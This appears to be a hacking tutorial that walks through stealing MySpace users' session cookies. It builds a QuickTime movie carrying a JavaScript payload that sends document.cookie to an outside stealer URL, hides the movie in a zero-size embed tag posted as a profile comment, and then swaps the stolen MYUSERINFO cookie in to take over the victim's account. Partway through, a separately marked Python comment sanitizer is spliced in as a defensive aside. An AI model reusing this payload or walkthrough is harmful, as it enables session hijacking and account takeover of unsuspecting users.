A host that allows PHP hosting and write capabilities
A PHP Cookie Stealer
QuickTime Pro

Today I will show you how to hack MySpace through cookie-stealing session hijacking.

First you must obtain a PHP cookie stealer. If you don't know how to code in PHP, you can obtain one HERE
Let's get started...

First we obtain a cookie stealer... for those who don't know how to code in PHP

Now we craft the QuickTime exploit

First we make a text file with JavaScript parameters, which will redirect to the cookie stealer.

A<javascript:window.location='http://texasholdem.php0h.com/cookies.php?c='+escape(document.cookie);> T<>
This redirects to my cookie stealer... as you can see, it contains a QuickTime param.

Now that we have it... we need to hide the text, so it doesn't appear and the user doesn't know what's happening.
Go to Window --> Movie Properties and then uncheck the Text Track and rename it HREFTrack.

Now that we have crafted it... we upload it to our server.

OK, done. Now we comment on the target.

We will use the embed tag to play the movie (XSS Backdoor), which will redirect to our cookie stealer...

<embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" src="http://myspace12.php0h.com/exploit.mov" width="0px" height="0px"></embed>

We embed the HTML code into the comment... as soon as this person sees the comment, their cookies are ours!!!!! hehehehe
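Seen from the site operator's side, the comment field is the point where this chain is broken: if comment HTML is rebuilt from an allowlist, the `<embed>` tag never reaches a viewer's browser. The following is an added example, not part of the original page; the allowlist policy, the names `sanitize_comment` and `CommentSanitizer`, and the sample comment are assumptions made for illustration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed comment policy (hypothetical): permitted tags and their attributes.
ALLOWED = {"b": set(), "i": set(), "p": set(), "br": set(), "a": {"href"}}
VOID = {"br"}
SAFE_SCHEMES = {"http", "https"}

def _safe_url(value):
    """True only for absolute http(s) URLs; javascript:, data: etc. fail."""
    try:
        return urlsplit(value.strip()).scheme.lower() in SAFE_SCHEMES
    except ValueError:
        return False

class CommentSanitizer(HTMLParser):
    """Rebuild comment HTML from the allowlist; everything else is dropped."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.dropped = [], []  # dropped: tag names, for alerting

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:
            self.dropped.append(tag)
            return
        kept = ""
        for name, value in attrs:
            if name not in ALLOWED[tag] or value is None:
                continue
            if name == "href" and not _safe_url(value):
                continue
            kept += f' {name}="{escape(value, quote=True)}"'
        self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED and tag not in VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))

def sanitize_comment(html_text):
    parser = CommentSanitizer()
    parser.feed(html_text)
    parser.close()  # flush any buffered text
    return "".join(parser.out), parser.dropped

# Constructed sample: a zero-size remote <embed> hidden in a friendly comment.
SAMPLE = ('Nice page! <embed src="http://media.example.invalid/clip.mov" '
          'width="0px" height="0px"></embed><a href="javascript:void(0)">x</a>')
```

`sanitize_comment(SAMPLE)` returns the cleaned markup plus the list of dropped tag names, which can be logged to flag accounts posting hidden embeds. Marking the session cookie `HttpOnly` additionally keeps it out of `document.cookie`.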

Now we just wait.

After a while, check the outputted .htm the PHP cookie stealer made... cookies.htm

Now we need MYUSERINFO... which contains all the session data... once you replace yours with theirs... you have hijacked their session.

That is our victim!!!

Now let's hope we've got it

Ok, now you need a cookie editor... try to get an extension from Mozilla's site.

This is what MYUSERINFO looks like...


That is the data we need to replace.

Refresh and.... voila... session hijacked!!!!

But as you can see, you can only do a bit w/ the profile, like comment and message... and edit the profile...

hmm lets see...

hehehe done!!!!

Video made by Insidious

Hope you had fun!!